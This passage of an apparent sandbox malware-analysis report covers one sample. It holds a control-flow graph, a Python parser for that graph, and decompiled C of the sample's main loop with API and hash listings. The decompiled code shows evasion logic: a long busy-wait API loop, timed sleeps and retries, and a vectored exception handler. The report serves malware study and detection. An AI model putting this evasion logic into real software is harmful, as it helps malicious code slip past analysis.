234->221 250 5d2a53-5d2a56 234->250 242 5d2b24-5d2b3f call 5d7770 236->242 243 5d2b10-5d2b22 call 5d7d20 236->243 242->224 254 5d2b41-5d2b54 call 5d6750 242->254 243->224 243->242 245->211 250->233 251->227 255 5d2679-5d268e call 5d1960 252->255 256 5d266b-5d2676 call 5c2230 252->256 254->224 263 5d26a8-5d26b8 255->263 264 5d2690-5d26a0 call 5c9200 255->264 256->255 265 5d26ba-5d26c1 263->265 266 5d2711-5d271c call 5c5370 263->266 264->263 276 5d26a2 264->276 268 5d26cd-5d26d2 265->268 269 5d26c3-5d26c8 call 5c2da0 265->269 278 5d271e-5d272d call 5d4520 266->278 279 5d2733-5d2740 call 5d4520 266->279 274 5d26d4-5d26d6 268->274 275 5d26f0-5d26f2 268->275 269->268 274->275 280 5d26d8-5d26e0 274->280 281 5d26fc-5d2707 call 5c80f0 275->281 282 5d26f4-5d26fa 275->282 276->263 292 5d272f-5d2731 278->292 293 5d2742 278->293 295 5d2744-5d276d call 5d4520 call 5d4610 279->295 280->275 284 5d26e2-5d26eb call 5c3200 280->284 286 5d270a-5d270d 281->286 282->281 282->286 284->275 286->266 292->295 293->295 300 5d276f-5d277e call 5d4e70 295->300 303 5d27aa-5d27b2 300->303 304 5d2780-5d278a GetTickCount 300->304 306 5d27b4-5d27c0 303->306 307 5d27c2-5d27eb call 5c7c50 303->307 304->303 305 5d278c-5d27a5 call 5d3b90 304->305 305->303 306->307 309 5d27f7-5d2805 306->309 307->309 317 5d27ed 307->317 313 5d2837-5d2845 309->313 314 5d2807-5d2812 309->314 315 5d2847-5d2874 call 5ca170 call 5c7a60 call 5d4520 313->315 316 5d28c1-5d28ce call 5d0300 313->316 314->313 318 5d2814-5d2831 call 5c9060 314->318 340 5d287a 315->340 341 5d2876-5d2878 315->341 316->232 327 5d28d4-5d28db 316->327 317->309 318->313 325 5d29d3-5d29f0 call 5d6750 318->325 325->232 330 5d28dd-5d28ef call 5d4610 327->330 331 5d293c-5d2943 327->331 330->232 342 5d28f5-5d2905 call 5ca180 330->342 331->141 335 5d2949-5d2950 331->335 338 5d2964-5d297a 335->338 339 5d2952-5d295c 335->339 343 5d297e-5d2988 Sleep 338->343 339->338 346 5d287c-5d28ac call 5d4520 call 5d4610 340->346 341->346 351 5d290b-5d2918 call 5d2f10 
342->351 352 5d29a7-5d29b0 342->352 344 5d298a-5d2992 343->344 345 5d2994-5d299c 343->345 344->343 344->345 345->300 349 5d29a2 345->349 361 5d28ae-5d28b4 call 5c91e0 346->361 362 5d28b7-5d28bc call 5d4e70 346->362 349->232 363 5d291a-5d292e call 5d73c0 call 5c91e0 351->363 364 5d2931-5d2937 call 5c77e0 351->364 355 5d29b4-5d29b7 352->355 356 5d29b2 352->356 355->232 360 5d29bd-5d29c0 355->360 356->355 360->232 365 5d29c6-5d29c8 360->365 361->362 362->316 363->364 364->331 365->232 369 5d29ce 365->369 369->141
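The `control_flow_graph` line above is the report's flattened serialization of the function's basic blocks: each block appears as `<id> <start>-<end>` followed by its internal `call <addr>` targets and the Windows API names it imports, and each edge as `<src>-><dst>`. As an added example (not part of the Joe Sandbox report or the sample), the Python below parses that format and answers the questions an analyst wants from it: which block loops on itself, which blocks can reach the `ExitProcess` block. `CFG_EXCERPT` is copied from the first blocks of the line above; the tokenization rules are inferred from that line and are an assumption about the format.

```python
import re
from collections import defaultdict

# Constructed excerpt: the first basic blocks of the report's control_flow_graph line
# for the function at 0x5d2370 (copied from the page, truncated after block 141).
CFG_EXCERPT = (
    "129 5d2370-5d23a1 call 5c61d0 "
    "132 5d23a5-5d23c6 SetLastError GetModuleHandleW GetLastError 129->132 132->132 "
    "133 5d23c8-5d23e8 132->133 "
    "134 5d23ee-5d2449 RtlAddVectoredExceptionHandler call 5c7340 call 5c3a80 "
    "call 5c3ec0 SetCurrentDirectoryW 133->134 "
    "135 5d24c9-5d24d0 133->135 "
    "158 5d2b7c-5d2b87 call 5c18e0 134->158 "
    "159 5d244f-5d2465 call 5d2d90 call 5c2da0 134->159 "
    "136 5d24e2-5d24e9 135->136 "
    "137 5d24d2-5d24d5 135->137 "
    "142 5d2528-5d2564 call 5c61e0 call 5c3180 call 5c61e0 call 5c9ee0 136->142 "
    "143 5d24eb-5d2522 call 5c5140 call 5d43c0 call 5cab10 call 5c5140 call 5c31d0 136->143 "
    "140 5d24db-5d24de 137->140 "
    "141 5d2b8a-5d2b96 call 5d1fe0 CoUninitialize ExitProcess 137->141 140->136 142->141"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# a block address is either "start-end" or a single address (blocks like "210 5d2aa6")
ADDR_RE = re.compile(r"^[0-9a-f]{4,8}(?:-[0-9a-f]{4,8})?$")


def parse_cfg(text):
    """Return (nodes, edges): nodes maps block id -> {range, calls, apis}; edges is a list of (src, dst)."""
    nodes, edges = {}, []
    tokens = text.split()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif tok == "call":
            # "call <callee>": an internal call made from the current block
            nodes[current]["calls"].append(tokens[i + 1])
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            # "<id> <address>": start of a new basic block
            current = int(tok)
            nodes[current] = {"range": tokens[i + 1], "calls": [], "apis": []}
            i += 1
        else:
            # any other token is an imported Windows API name used by the current block
            nodes[current]["apis"].append(tok)
        i += 1
    return nodes, edges


def self_loops(edges):
    """Blocks with an edge to themselves (tight loops such as the API-spinning block 132)."""
    return sorted({s for s, d in edges if s == d})


def blocks_calling(nodes, api):
    """Block ids whose import list contains the given API name."""
    return sorted(n for n, info in nodes.items() if api in info["apis"])


def ancestors(edges, target):
    """All blocks from which `target` is reachable, by reverse breadth-first search."""
    preds = defaultdict(set)
    for s, d in edges:
        preds[d].add(s)
    seen, work = set(), [target]
    while work:
        n = work.pop()
        for p in preds[n]:
            if p not in seen:
                seen.add(p)
                work.append(p)
    return seen


def exit_path_summary(text):
    """Which blocks terminate the process, which blocks can reach them, and which blocks spin."""
    nodes, edges = parse_cfg(text)
    exits = blocks_calling(nodes, "ExitProcess")
    reach = set()
    for e in exits:
        reach |= ancestors(edges, e)
    return {
        "exit_blocks": exits,
        "blocks_reaching_exit": sorted(reach),
        "self_loops": self_loops(edges),
    }


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_EXCERPT)
    print(len(nodes), "blocks,", len(edges), "edges")
    for n in self_loops(edges):
        print("self-loop block", n, nodes[n]["range"], nodes[n]["apis"])
    print(exit_path_summary(CFG_EXCERPT))
```

Feeding the whole `control_flow_graph` line in instead of the excerpt works the same way; the self-loop query is what singles out block 132, the `SetLastError`/`GetModuleHandleW`/`GetLastError` spin that the C code below runs 0x18721 times before anything else happens.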
                          C-Code - Quality: 74%
                          			E005D2370(intOrPtr _a4) {
                          				char _v532;
                          				char _v536;
                          				char _v1052;
                          				long _v1056;
                          				short _v1060;
                          				struct _SECURITY_ATTRIBUTES* _v1068;
                          				struct _SECURITY_ATTRIBUTES* _v1072;
                          				char _v1076;
                          				void* _v1080;
                          				intOrPtr _v1084;
                          				void* _v1088;
                          				char _v1092;
                          				intOrPtr _v1096;
                          				void* _v1100;
                          				signed int _v1104;
                          				signed int _v1108;
                          				void* _v1112;
                          				signed int _v1116;
                          				signed int _v1120;
                          				long _t79;
                          				intOrPtr _t95;
                          				intOrPtr _t97;
                          				void* _t98;
                          				void* _t101;
                          				void* _t104;
                          				void* _t105;
                          				intOrPtr _t106;
                          				void* _t108;
                          				intOrPtr _t109;
                          				intOrPtr _t113;
                          				void* _t114;
                          				signed int _t119;
                          				signed int _t124;
                          				char* _t126;
                          				signed int _t130;
                          				void* _t132;
                          				signed int _t138;
                          				signed int _t139;
                          				signed int _t140;
                          				signed int _t141;
                          				signed int _t145;
                          				signed int _t146;
                          				char* _t149;
                          				signed int _t158;
                          				intOrPtr _t159;
                          				long _t161;
                          				signed int _t165;
                          				signed int _t171;
                          				void* _t174;
                          				signed int _t179;
                          				void* _t180;
                          				void** _t183;
                          				intOrPtr _t187;
                          				void* _t188;
                          				signed int _t194;
                          				long _t195;
                          				signed int _t198;
                          				void* _t199;
                          				char* _t201;
                          				void* _t202;
                          				void* _t206;
                          				signed int _t207;
                          				void* _t208;
                          				void* _t212;
                          				intOrPtr _t214;
                          				intOrPtr _t218;
                          				void* _t226;
                          				intOrPtr _t227;
                          				intOrPtr _t228;
                          				intOrPtr _t229;
                          				signed int _t230;
                          				intOrPtr _t231;
                          				signed int _t237;
                          				signed int _t239;
                          				signed int _t248;
                          				void* _t249;
                          				intOrPtr* _t250;
                          				void* _t251;
                          				void* _t252;
                          				intOrPtr _t254;
                          				void* _t255;
                          				signed int _t257;
                          				signed int _t264;
                          				void* _t266;
                          				void* _t268;
                          				void* _t270;
                          				void* _t272;
                          				void* _t273;
                          				void* _t275;
                          				void* _t278;
                          				intOrPtr _t287;
                          				void* _t294;
                          
                          				_t266 = (_t264 & 0xfffffff8) - 0x450;
                          				_t203 =  &_v1092;
                          				E005C61D0( &_v1092);
                          				_t199 = 0x18721;
                          				_v1060 = 0;
                          				_v1076 = 0;
                          				_v1068 = 0;
                          				_v1072 = 0;
                          				do { // 0x18721 (100129) rounds of SetLastError/GetModuleHandleW/GetLastError with no other effect (CFG block 132, the self-loop): a time-wasting loop, analyst interpretation
                          					SetLastError(0);
                          					GetModuleHandleW(0);
                          					_t79 = GetLastError();
                          					asm("adc dword [esp+0x34], 0x0");
                          					_t199 = _t199 - 1;
                          					_v1072 = _t79 + _v1072;
                          				} while (_t199 > 1);
                          				_t282 =  *0x5d9ab8;
                          				_v1116 = 0;
                          				_v1088 = 0;
                          				 *0x5d9ae0 =  &_v1092;
                          				if( *0x5d9ab8 != 0) {
                          					L9:
                          					_t82 =  *0x5d9ba0; // 0x0
                          					if(_t82 == 0) {
                          						L12:
                          						_t291 =  *0x5d9ab4;
                          						if( *0x5d9ab4 == 0) {
                          							_t180 = E005C5140(0x28);
                          							E005D43C0(_t180, _t237, _t291);
                          							 *0x5d9ab4 = _t180;
                          							E005CAB10();
                          							_t183 = E005C5140(0x1c);
                          							_t266 = _t266 + 8;
                          							_t203 = _t183;
                          							E005C31D0(_t183);
                          							 *0x5d9ac8 = _t183;
                          						}
                          						 *0x5d9ad0 = 0;
                          						_t247 = E005C61E0(1, 0);
                          						_t200 = E005C3180(_t85 + 0x100, 0);
                          						E005C61E0(1, _t87);
                          						_push(_t85);
                          						_push(_t87);
                          						_t82 = E005C9EE0(_t203);
                          						_t268 = _t266 + 0x10;
                          						if(_t82 == 0) {
                          							L107:
                          							E005D1FE0(_t82); // executed
                          							L005D30B0(); // executed
                          							ExitProcess("true");
                          						} else {
                          							E005D6610(_t200, 0, _t247);
                          							E005C91E0(_t200);
                          							_t270 = _t268 + 0x10;
                          							_t248 = 8;
                          							while(1) {
                          								_push( *0x5d9ab4);
                          								_push( *0x5d9aa0);
                          								E005CC7C0();
                          								_t82 = E005D7770(_t237,  *0x5d9ab4, 0x5d9ac8);
                          								_t270 = _t270 + 0x10;
                          								if(_t82 != 0) {
                          									break;
                          								}
                          								Sleep(0x2710); // 10 s between attempts; _t248 limits this to 8 tries
                          								_t18 = _t248 - 1; // 0x7
                          								_t179 = _t18;
                          								_t294 = _t248 + 1 - 1;
                          								_t248 = _t179;
                          								if(_t294 > 0) {
                          									continue;
                          								} else {
                          									_t82 = _t179 + 1;
                          									_t248 = _t179 + 1;
                          									break;
                          								}
                          							}
                          							if(_t248 == 0) {
                          								goto L107;
                          							} else {
                          								_t95 =  *0x5d9ac8; // 0x0
                          								E005D6750( *((intOrPtr*)(_t95 + 8)));
                          								_t297 = _v1120;
                          								if(_v1120 == 0) {
                          									_t231 =  *0x5d9a94; // 0x0
                          									E005D4980(_t231, _t297);
                          									CreateThread(0, 0, E005D3F50,  *0x5d9ab4, 0,  &_v1056);
                          								}
                          								_t201 =  &_v532;
                          								_v1104 = 0;
                          								_v1108 = 0;
                          								while(1) {
                          									_t97 =  *0x5d9ac8; // 0x0
                          									 *0x5d9b7c = 0;
                          									_t98 = E005CC430( *((intOrPtr*)(_t97 + 0xc)));
                          									_t299 = _t98;
                          									if(_t98 == 0) {
                          										goto L96;
                          									} else {
                          										_v1112 = 0;
                          										goto L86;
                          									}
                          									do {
                          										L86:
                          										_t109 =  *0x5d9ac8; // 0x0
                          										_t250 = E005C42F0( *((intOrPtr*)(_t109 + 0xc)),  *0x5d9b7c);
                          										_t212 =  *0x5d9ab4; // 0x0
                          										if(E005D6BD0(_t212, _t299,  *_t250,  *(_t110 + 4) & 0x0000ffff) == 0) {
                          											L89:
                          											_push(0x1f4); // 500 ms argument for the Sleep at L93
                          											L93:
                          											Sleep();
                          											goto L94;
                          										}
                          										_v1120 = E005D4E70();
                          										_t301 = _v1120 -  *(_t250 + 8) - 0x3841;
                          										if(_v1120 -  *(_t250 + 8) < 0x3841) {
                          											L91:
                          											_t119 = E005C3C40( *0x5d9ab4,  &_v1076);
                          											_t270 = _t270 + 8;
                          											__eflags = _t119;
                          											if(_t119 == 0) {
                          												__eflags = _v1116;
                          												_t214 =  *0x5d9a94; // 0x0
                          												 *((intOrPtr*)(_t214 + 0xc)) = _v1076;
                          												if(__eflags != 0) {
                          													E005C2230(__eflags,  *0x5d9ab4);
                          													_t270 = _t270 + 4;
                          												}
                          												E005D1960(__eflags,  *0x5d9ab4);
                          												_t272 = _t270 + 4;
                          												__eflags =  *0x5d9c54;
                          												if(__eflags == 0) {
                          													_t171 = E005C9200(__eflags,  *0x5d9ab4);
                          													_t272 = _t272 + 4;
                          													__eflags = _t171;
                          													if(_t171 != 0) {
                          														 *0x5d9c54 =  *0x5d9c54 + 1;
                          														__eflags =  *0x5d9c54;
                          													}
                          												}
                          												_v1084 = _t250;
                          												__eflags = _v1120 - _v1108 - 0xe11;
                          												if(_v1120 - _v1108 < 0xe11) {
                          													L41:
                          													_t124 = E005C5370();
                          													__eflags = _t124;
                          													if(_t124 < 0) {
                          														E005D4520(_t201, 0x46);
                          														_t273 = _t272 + 8;
                          														_push(0x48);
                          													} else {
                          														E005D4520(_t201, 0x46);
                          														_t273 = _t272 + 8;
                          														__eflags = _t124;
                          														if(_t124 == 0) {
                          															_push(0x47);
                          														} else {
                          															_push(0x49);
                          														}
                          													}
                          													_t126 =  &_v1052;
                          													_push(_t126);
                          													E005D4520();
                          													_push(_t126);
                          													E005D4610( *0x5d9ab4, 0xe, _t201);
                          													_t270 = _t273 + 0x18;
                          													_t254 = _v1084;
                          													_v1112 = _v1112 + 1;
                          													_t202 = 0;
                          													__eflags = 0;
                          													do {
                          														_v1120 = E005D4E70();
                          														__eflags =  *0x5d9abc;
                          														if( *0x5d9abc == 0) {
                          															_t161 = GetTickCount();
                          															__eflags = _t161 - _v1088;
                          															if(_t161 > _v1088) {
                          																_push(0);
                          																_push( *0x5d9ab4);
                          																_push( *0x5d9ac8);
                          																E005D3B90(_t237);
                          																_t270 = _t270 + 0xc;
                          																 *0x5d9abc = _v1120;
                          															}
                          														}
                          														_t130 =  *0x5d9b9c; // 0x0
                          														__eflags =  *_t130 - 2;
                          														if( *_t130 == 2) {
                          															L52:
                          															_push( &_v1092);
                          															_push( *0x5d9ab4);
                          															_t132 = E005C7C50();
                          															_t270 = _t270 + 8;
                          															_t237 =  *0x5d9b9c; // 0x0
                          															__eflags = _t132 - 1;
                          															 *((intOrPtr*)(_t237 + 0x10)) = _v1120 + 0xfffff8f8;
                          															if(_t132 == 1) {
                          																 *0x5d9b14 = 1;
                          															}
                          															goto L54;
                          														} else {
                          															__eflags = _v1120 -  *((intOrPtr*)(_t130 + 0x10)) - 0x1519;
                          															if(_v1120 -  *((intOrPtr*)(_t130 + 0x10)) < 0x1519) {
                          																L54:
                          																__eflags = _v1120 -  *0x5d9bec - 0x4b1;
                          																if(_v1120 -  *0x5d9bec < 0x4b1) {
                          																	L57:
                          																	__eflags = _v1120 -  *0x5d9ac4 - 0x7081;
                          																	if(_v1120 -  *0x5d9ac4 >= 0x7081) {
                          																		_t145 = E005CA170();
                          																		_t257 = _t145;
                          																		_push(_t145);
                          																		_t146 = E005C7A60();
                          																		E005D4520( &_v536, 0x4a);
                          																		_t275 = _t270 + 8;
                          																		__eflags = _t146;
                          																		if(_t146 == 0) {
                          																			_push(0x4b);
                          																		} else {
                          																			_push(0x4c);
                          																		}
                          																		_t149 =  &_v1052;
                          																		_push(_t149);
                          																		E005D4520();
                          																		_push(_t149);
                          																		E005D4610( *0x5d9ab4, 0xe,  &_v532);
                          																		_t270 = _t275 + 0x18;
                          																		__eflags = _t257;
                          																		if(_t257 != 0) {
                          																			E005C91E0(_t257);
                          																			_t270 = _t270 + 4;
                          																		}
                          																		 *0x5d9ac4 = E005D4E70();
                          																	}
                          																	_t218 =  *0x5d9a94; // 0x0
                          																	_t82 = E005D0300(_t218, _t237);
                          																	__eflags = _t82;
                          																	if(_t82 == 0) {
                          																		goto L94;
                          																	} else {
                          																		__eflags =  *0x5d9abc;
                          																		if( *0x5d9abc == 0) {
                          																			L71:
                          																			__eflags =  *0x5d9b14;
                          																			if( *0x5d9b14 != 0) {
                          																				goto L107;
                          																			}
                          																			__eflags =  *0x5d9ad0;
                          																			if( *0x5d9ad0 != 0) {
                          																				 *0x5d9ad0 = 0;
                          																				_v1104 = 5;
                          																			}
                          																			_t239 = _v1104;
                          																			__eflags = _t239;
                          																			_t138 = 0 | __eflags <= 0x00000000;
                          																			_t237 = _t239 - (0 | __eflags > 0x00000000);
                          																			__eflags = _t237;
                          																			_t55 = _t138 * 8; // 0x1
                          																			_t255 = _t138 + _t55 + 1;
                          																			_v1104 = _t237;
                          																			while(1) {
                          																				Sleep(0x4e20); // 20 s per iteration, repeated while _t255 >= 2 and *0x5d9ad0 == 0
                          																				__eflags = _t255 - 2;
                          																				if(_t255 < 2) {
                          																					goto L77;
                          																				}
                          																				_t139 =  *0x5d9ad0; // 0x0
                          																				_t255 = _t255 - 1;
                          																				__eflags = _t139;
                          																				if(_t139 == 0) {
                          																					continue;
                          																				}
                          																				goto L77;
                          																			}
                          																			goto L77;
                          																		}
                          																		_push(1);
                          																		_push( *0x5d9ab4);
                          																		_t140 = E005D4610();
                          																		_t270 = _t270 + 8;
                          																		__eflags = _t140;
                          																		if(_t140 == 0) {
                          																			goto L94;
                          																		}
                          																		_t141 = E005CA180( *0x5d9ab4);
                          																		_t270 = _t270 + 4;
                          																		__eflags = _t141;
                          																		if(_t141 == 0) {
                          																			_t82 =  *0x5d9b14; // 0x0
                          																			_t226 = 0xf;
                          																			__eflags = _t82;
                          																			if(_t82 != 0) {
                          																				_t226 = 4;
                          																			}
                          																			__eflags = _t226 - 0xc;
                          																			if(_t226 == 0xc) {
                          																				goto L94;
                          																			} else {
                          																				__eflags = _t226 - 0xf;
                          																				if(_t226 == 0xf) {
                          																					goto L94;
                          																				}
                          																				__eflags = _t82;
                          																				if(_t82 == 0) {
                          																					goto L94;
                          																				}
                          																				goto L107;
                          																			}
                          																		}
                          																		_t227 =  *0x5d9a94; // 0x0
                          																		__eflags = E005D2F10(_t227);
                          																		if(__eflags != 0) {
                          																			_t229 =  *0x5d9a94; // 0x0
                          																			E005D73C0(_t229, _t142);
                          																			E005C91E0(_t142);
                          																			_t270 = _t270 + 4;
                          																		}
                          																		_t228 =  *0x5d9a94; // 0x0
                          																		_t82 = E005C77E0(_t228, __eflags);
                          																		goto L71;
                          																	}
                          																}
                          																__eflags = _v1120 -  *((intOrPtr*)(_t254 + 0xc)) - 0x3841;
                          																if(_v1120 -  *((intOrPtr*)(_t254 + 0xc)) < 0x3841) {
                          																	goto L57;
                          																}
                          																 *0x5d9bec = _v1120;
                          																_t158 = E005C9060( *0x5d9ab4, 0x5d9ac8);
                          																_t270 = _t270 + 8;
                          																__eflags = _t158;
                          																if(_t158 != 0) {
                          																	_t159 =  *0x5d9ac8; // 0x0
                          																	E005D6750( *((intOrPtr*)(_t159 + 8)));
                          																	 *0x5d9b7c = 0;
                          																	goto L94;
                          																}
                          																goto L57;
                          															}
                          															goto L52;
                          														}
                          														L77:
                          														_t254 = _v1084;
                          														_t202 = _t202 + 1;
                          														__eflags = _t202 - 0x64;
                          													} while (_t202 < 0x64);
                          													goto L94;
                          												} else {
                          													_t165 =  *0x5d9bf8; // 0x3
                          													__eflags = _t165;
                          													if(_t165 <= 0) {
                          														E005C2DA0();
                          														_t165 =  *0x5d9bf8; // 0x3
                          													}
                          													__eflags = _v1108;
                          													if(_v1108 != 0) {
                          														__eflags = _t165;
                          														if(_t165 > 0) {
                          															_t230 =  *0x5d9c40; // 0x27ab78
                          															__eflags = _t230;
                          															if(_t230 != 0) {
                          																_push(_t230);
                          																E005C3200();
                          																_t272 = _t272 + 4;
                          																_t165 =  *0x5d9bf8; // 0x3
                          															}
                          														}
                          													}
                          													__eflags = _t165;
                          													if(_t165 < 0) {
                          														L39:
                          														E005C80F0( *0x5d9ab4);
                          														_t272 = _t272 + 4;
                          														goto L40;
                          													} else {
                          														__eflags = (_t165 | 0x00000001) - 3;
                          														if((_t165 | 0x00000001) != 3) {
                          															L40:
                          															_v1108 = _v1120;
                          															goto L41;
                          														}
                          														goto L39;
                          													}
                          												}
                          											}
                          											_push(0x3e8); // 1 s argument for the Sleep at L93
                          											goto L93;
                          										}
                          										_t174 = E005C5960(_t301,  *0x5d9ab4,  &_v1060);
                          										_t270 = _t270 + 8;
                          										if(_t174 == 0) {
                          											 *(_t250 + 8) = _v1120;
                          											goto L91;
                          										}
                          										goto L89;
                          										L94:
                          										_t251 =  *0x5d9b7c; // 0x0
                          										_t113 =  *0x5d9ac8; // 0x0
                          										_t252 = _t251 + 1;
                          										 *0x5d9b7c = _t252;
                          										_t114 = E005CC430( *((intOrPtr*)(_t113 + 0xc)));
                          										_t201 =  &_v532;
                          									} while (_t252 < _t114);
                          									L97:
                          									_t206 =  *0x5d9ab4; // 0x0
                          									_v1100 = 0;
                          									_t249 = E005C1B50(_t206,  &_v1100);
                          									_push( *0x5d9ab4);
                          									_push( *0x5d9aa0);
                          									_t101 = E005CC7C0();
                          									_t270 = _t270 + 8;
                          									_t207 = 1;
                          									if(_t101 == 0) {
                          										L103:
                          										if(_v1112 == 0) {
                          											_t311 = _t207;
                          											if(_t207 != 0) {
                          												_push( *0x5d9ab4);
                          												E005CAB60(_t311);
                          												_t270 = _t270 + 4;
                          											}
                          										}
                          										continue;
                          									}
                          									_t208 =  *0x5d9ab4; // 0x0
                          									_v1080 = 0;
                          									_t104 = E005C1B50(_t208,  &_v1080);
                          									_t207 = 1;
                          									if(_t104 == 0) {
                          										goto L103;
                          									}
                          									_t209 = _v1100;
                          									if(_v1100 != _v1080) {
                          										L101:
                          										_t105 = E005D7770(_t237,  *0x5d9ab4, 0x5d9ac8);
                          										_t270 = _t270 + 8;
                          										_t207 = 1;
                          										if(_t105 == 3) {
                          											_t106 =  *0x5d9ac8; // 0x0
                          											E005D6750( *((intOrPtr*)(_t106 + 8)));
                          											_t207 = 0;
                          										}
                          										goto L103;
                          									}
                          									_t108 = E005D7D20(_t249, _t104, _t209);
                          									_t270 = _t270 + 0xc;
                          									_t207 = 1;
                          									if(_t108 != 0) {
                          										goto L103;
                          									}
                          									goto L101;
                          									L96:
                          									_v1112 = 0;
                          									goto L97;
                          								}
                          							}
                          						}
                          					}
                          					if(_t82 > 2) {
                          						goto L107;
                          					} else {
                          						_v1116 = 1;
                          						goto L12;
                          					}
                          				}
                          				_t187 =  *0x5d9cf4(0, E005C58F0); // executed
                          				_t203 =  &_v1100;
                          				 *0x5d9ab8 = _t187;
                          				 *0x5d9bf0 = 1;
                          				_t188 = E005C7340( &_v1100);
                          				 *0x5d9ae8 = E005C3A80();
                          				_v1060 = 0;
                          				_push(0x5d9c40);
                          				_push(0x5d9aa0);
                          				_push(_a4);
                          				E005C3EC0(_t237, _t282);
                          				_t278 = _t266 + 0xc;
                          				SetCurrentDirectoryW( *0x5d9aa0); // executed
                          				if(_t188 != 0) {
                          					_t82 = E005C18E0(_t237, __eflags,  *0x5d9aa0);
                          					goto L107;
                          				}
                          				 *0x5d9ab4 = 0;
                          				E005D2D90();
                          				if(E005C2DA0() == 0) {
                          					L7:
                          					_t194 = E005C3180(0x1c, 0);
                          					_t266 = _t278 + 8;
                          					 *0x5d9b9c = _t194;
                          					 *((intOrPtr*)(_t194 + 0x10)) = 0;
                          					_t195 = GetTickCount();
                          					_t287 =  *0x5d9c04; // 0x0
                          					 *0x5d9ac4 = 0;
                          					 *0x5d9bec = 0;
                          					 *0x5d9c54 = 0;
                          					_v1096 = _t195 + 0x1d4c0;
                          					if(_t287 == 0) {
                          						 *0x5d9c04 = E005D1690();
                          					}
                          					goto L9;
                          				}
                          				_t198 =  *0x5d9c40; // 0x27ab78
                          				if(_t198 == 0) {
                          					goto L7;
                          				}
                          				_push(_t198); // executed
                          				_t82 = E005C3200(); // executed
                          				_t278 = _t278 + 4;
                          				if(_t82 == 0) {
                          					goto L107;
                          				}
                          				goto L7;
                          			}

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 005D23A6
                          • GetModuleHandleW.KERNEL32(00000000), ref: 005D23AD
                          • GetLastError.KERNEL32 ref: 005D23B3
                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,005C58F0), ref: 005D23F5
                          • SetCurrentDirectoryW.KERNELBASE ref: 005D2441
                          • GetTickCount.KERNEL32 ref: 005D2496
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,?,?,?,00000001,00000000), ref: 005D25BA
                          • CreateThread.KERNEL32(00000000,00000000,005D3F50,00000000,?), ref: 005D260E
                          • GetTickCount.KERNEL32 ref: 005D2780
                          • Sleep.KERNEL32(00004E20), ref: 005D2983
                          • Sleep.KERNEL32(000001F4,00000000,?), ref: 005D2A79
                          • CoUninitialize.OLE32 ref: 005D2B8F
                          • ExitProcess.KERNEL32 ref: 005D2B96
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Sleep$CountErrorLastTick$CreateCurrentDirectoryExceptionExitFreeHandleHandlerHeapModuleProcessThreadUninitializeVectored
                          • String ID:
                          • API String ID: 1891522815-0
                          • Opcode ID: 024b12438f38467577f177f168d0f94333162a11ceff679776b5004c8ea7d0e0
                          • Instruction ID: 8b7a2148c8e78589a709b88f0f1b8ae0b1c94dd1b49653fd9e0c0035186e3a5d
                          • Opcode Fuzzy Hash: 024b12438f38467577f177f168d0f94333162a11ceff679776b5004c8ea7d0e0
                          • Instruction Fuzzy Hash: A1128F759052029FEB30EF68EC49B1A7FE5FBA4309F04442BE845973A1EB71D848DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (graph image not recoverable; basic blocks 5cf800-5cf8fc call CryptAcquireContextW, CryptCreateHash, CryptHashData, CryptGetHashParam, CryptDestroyHash and CryptReleaseContext, with subcalls to 5c3180 and 5c91e0)
                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000020,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 005CF824
                          • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 005CF841
                          • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 005CF859
                          • CryptGetHashParam.ADVAPI32(00000004,00000004,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 005CF87B
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • CryptGetHashParam.ADVAPI32(00000002,00000002,00000000,?,00000000,?,?,?,?,?,0000800C), ref: 005CF8A3
                          • CryptDestroyHash.ADVAPI32(00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?,00000002), ref: 005CF8CB
                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?), ref: 005CF8E4
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Crypt$Hash$ContextHeapParam$AcquireAllocateCreateDataDestroyProcessRelease
                          • String ID:
                          • API String ID: 3570522263-0
                          • Opcode ID: 6f562859804f95d0678a3eee0f3031f4be32ccb8c1f35c27981259cd6276be1c
                          • Instruction ID: fa0f8dca470dbaf065fe90b3bb52eae8812e6fec6e74cbe6cb13e55c5b70cff2
                          • Opcode Fuzzy Hash: 6f562859804f95d0678a3eee0f3031f4be32ccb8c1f35c27981259cd6276be1c
